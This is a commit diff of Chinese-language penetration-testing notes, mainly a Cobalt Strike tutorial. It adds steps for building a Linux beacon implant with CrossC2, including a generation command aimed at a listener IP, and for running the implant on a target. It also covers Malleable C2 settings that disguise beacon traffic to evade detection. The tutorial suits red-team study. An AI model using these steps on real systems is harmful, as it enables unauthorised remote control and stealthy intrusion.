Skip to content

Commit

Permalink
updated-20240215
Browse files Browse the repository at this point in the history
  • Loading branch information
@xf555er
xf555er committed Feb 15, 2024
1 parent fa6e998 commit f9475e7
Show file tree
Hide file tree
Showing 111 changed files with 3,142 additions and 15 deletions.
Empty file added C2Sharp开发.md
View file
Empty file.
113 changes: 106 additions & 7 deletions CobaltStrike的使用教程.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -89,7 +89,7 @@ Cobalt Strike 一款GUI的框架式渗透工具,集成了端口转发、服务

为新建的区域增添A记录, 如下图所示步骤依次添加CS服务器及代理服务器

- CS服务器: 别名为`team`, ip地址为`192.168.47.134`
- CS服务器: 别名为`CS`, ip地址为`192.168.47.134`

- 代理服务器1: 别名为`proxy1`, ip地址为`192.168.47.131`
- 代理服务器2: 别名为`proxy2`, ip地址为`192.168.47.140`
Expand Down Expand Up @@ -1196,9 +1196,9 @@ Cobalt Strike 是一个流行的渗透测试工具,主要用于模拟高级持

列出指定主机名的共享列表: `net share \\[主机名]`

![image-20221011000036372](CobaltStrike的使用教程/image-20221011000036372.png)

![image-20221011000036372](CobaltStrike的使用教程/image-20221011000036372.png)


## 获取域内用户和管理员信息

Expand Down Expand Up @@ -1306,10 +1306,10 @@ profile文件编写完成后,可使用CobaltStrike自带的c2lint来验证prof

### 3.加载Profile文件

在启动Cobalt Strike team server时,需要指定使用的Malleable C2 profile文件。可以在命令行中使用`-profiles`参数来指定文件路径,如下所示:
在启动Cobalt Strike team server时,可执行如下命令指定Malleable C2 profile文件

```
./teamserver [yourip] [password] -profiles myprofile.profile
./teamserver [yourip] [password] ./myprofile.profile
```

其中,[yourip][password]是你的C2服务器的IP地址和密码,myprofile.profile是你的Malleable C2 profile文件的路径
Expand Down Expand Up @@ -1400,6 +1400,8 @@ server {

### http-get

这部分配置信标发送到服务器的 HTTP GET 请求。这通常用于信标的 "check-in" 操作,即信标定期联系服务器以获取指令。`http-get` 配置可以包括请求的URI、请求头、请求参数等,以及服务器响应中应该包含的数据。这使得通信看起来像是正常的网络流量,帮助信标躲避入侵检测系统的侦测

如下代码定义了CS的HTTP GET请求的配置,分为两部分,`client`部分描述了Beacon发出的请求,`server`部分描述了C2服务器的响应

`metadata`块中,`base64url`表示Beacon将元数据进行Base64编码;`prepend "__cfduid="`表示在编码后的元数据前添加字符串`"__cfduid="``header "Cookie";`表示将元数据放入"Cookie"头部字段发送
Expand Down Expand Up @@ -1451,6 +1453,8 @@ http-get {

### http-post

这部分配置信标发送到服务器的 HTTP POST 请求。信标使用 POST 请求来发送数据回 C2 服务器,例如搜集到的信息、命令执行结果等

与http-get不同的是,http-post多了个id参数,id部分定义了如何传输session id

session id是CS用来标识不同的beacon实例的唯一标识符。为了与C2服务器进行有效通信,每个Beacon必须在其请求中包含这个标识符,以便C2服务器可以识别和处理每个请求。例如,如果session id是1234,那么Beacon发送的POST请求uri会是`/submit.php?id=1234`
Expand Down Expand Up @@ -1820,8 +1824,6 @@ post-ex {





# 十一、bof开发

## 前言
Expand Down Expand Up @@ -3014,6 +3016,103 @@ void go(char* buff, int len) {



# 十四、Cross2 Linux Shell

## 前言

CobaltStrike本身并不支持生成linux类型的payload,此处我们需要借用[CrossC2](https://github.com/gloxec/CrossC2)插件来生成,此插件目前仅支持HTTPS监听

我们可以在不同平台下使用CrossC2来生成payload

![image-20231214165312243](CobaltStrike的使用教程/image-20231214165312243.png)



## 步骤演示

### 1.下载CrossC2

此处我以在windows平台生成payload为例,首先在CobaltStrike目录新建一个CrossC2目录,并将`.cobaltstrike.beacon_keys`和CrossC2插件放进去,再将`genCrossC2.Win.zip`的文件解压至此目录

![image-20231214165932408](CobaltStrike的使用教程/image-20231214165932408.png)



### 2.修改插件并加载

修改`CrossC2.cna`的内容,将`$CC2_PATH`的值修改为CrossC2的根目录

```
$CC2_PATH = "E:\\HackerTools\\IntranetPenetration\\CobaltStrike\\CobaltStrike4.9\\CrossC2\\"; # <-------- fix
$CC2_BIN = "genCrossC2.exe";
```



在CobaltStrike客户端加载CrossC2插件

<img src="CobaltStrike的使用教程/image-20231214170437779.png" alt="image-20231214170437779" style="zoom:67%;" />



### 3.创建HTTPS监听

创建一个HTTPS类型的监听

<img src="CobaltStrike的使用教程/image-20231214170553405.png" alt="image-20231214170553405" style="zoom: 80%;" />



点击右上角的CrossC2插件,创建一个反向HTTPS监听

![image-20231214170655371](CobaltStrike的使用教程/image-20231214170655371.png)



Listener要选择之前创建的HTTPS监听;由于我teamserver启动时指定了profile文件,因此此处也需指定;CS版本虽然只有小于或等于4.8的版本可选择,但是实测4.9也是可以用的

![image-20231214172041962](CobaltStrike的使用教程/image-20231214172041962.png)



### 4.生成payload

点击build后会在CobaltStrike根目录下生成一个`beacon.out`

<img src="CobaltStrike的使用教程/image-20231214172410952.png" alt="image-20231214172410952" style="zoom:67%;" />



除了在插件生成payload, 还可以在linux或windows使用命令行来生成, Linux的这里就不演示了,命令行格式为如下所示:

```
genCrossC2 <listener-ip/domain> <listener-port> <beacon_keys> <rebind_library;config.ini;c2profile.profile> <target_platform> <target_arch> <output_file>
```

如下例子所示:

```
genCrossC2.exe 192.168.47.188 443 .cobaltstrike.beacon_keys ";;henry.profile" Linux x64 beacon.out
```

![image-20231214204548405](CobaltStrike的使用教程/image-20231214204548405.png)



### 5.执行payload

将生成的beacon.out上传至linux主机并赋予可执行权限, 随后执行

![image-20231214172744322](CobaltStrike的使用教程/image-20231214172744322.png)



beacon执行后,CobaltStrike显示目标主机上线

![image-20231214173111039](CobaltStrike的使用教程/image-20231214173111039.png)


# vps搭建可能遇到的问题

## 1.文件上传
Expand Down
Binary file added CobaltStrike的使用教程/image-20231214165312243.png
View file
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added CobaltStrike的使用教程/image-20231214165932408.png
View file
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added CobaltStrike的使用教程/image-20231214170437779.png
View file
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added CobaltStrike的使用教程/image-20231214170553405.png
View file
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added CobaltStrike的使用教程/image-20231214170655371.png
View file
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added CobaltStrike的使用教程/image-20231214172041962.png
View file
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added CobaltStrike的使用教程/image-20231214172410952.png
View file
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added CobaltStrike的使用教程/image-20231214172744322.png
View file
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added CobaltStrike的使用教程/image-20231214173111039.png
View file
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added CobaltStrike的使用教程/image-20231214204548405.png
View file
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
4 changes: 2 additions & 2 deletions 内网横向移动.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -139,7 +139,7 @@ net use \\<目标ip>\ipc$ /user:<用户名> <用户密码>

![image-20230829215830233](内网横向移动/image-20230829215830233.png)



执行如下命令查看计算机当前的网络连接

Expand Down Expand Up @@ -437,7 +437,7 @@ goldenPac.exe <域名>/<域用户名>:<域用户明文密码>@<域控完整域

![image-20230902110603664](内网横向移动/image-20230902110603664.png)



# Psexec

Expand Down
4 changes: 1 addition & 3 deletions 内网渗透基础.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -306,7 +306,7 @@ SAM文件位于 `%SystemRoot%\system32\config\` 目录下,负责存储本地



### LM和NTML哈希是什么
### LM和NTLM哈希是什么

Windows操作系统使用两种方法来对用户明文密码进行加密处理,这两种方法分别是LM Hash和NTLM Hash。在域环境中,用户信息存储在`ntds.dit`文件中,并且密码以散列值的形式加密。Windows操作系统中的密码通常由LM Hash和NTLM Hash两部分组成,它们的结构通常如下所示:

Expand Down Expand Up @@ -715,8 +715,6 @@ kerberos协议中也存在三个角色,分别是

![image-20230607233340578](内网渗透基础/image-20230607233340578.png)




### 白银票据
Expand Down
Loading

0 comments on commit f9475e7

Please sign in to comment.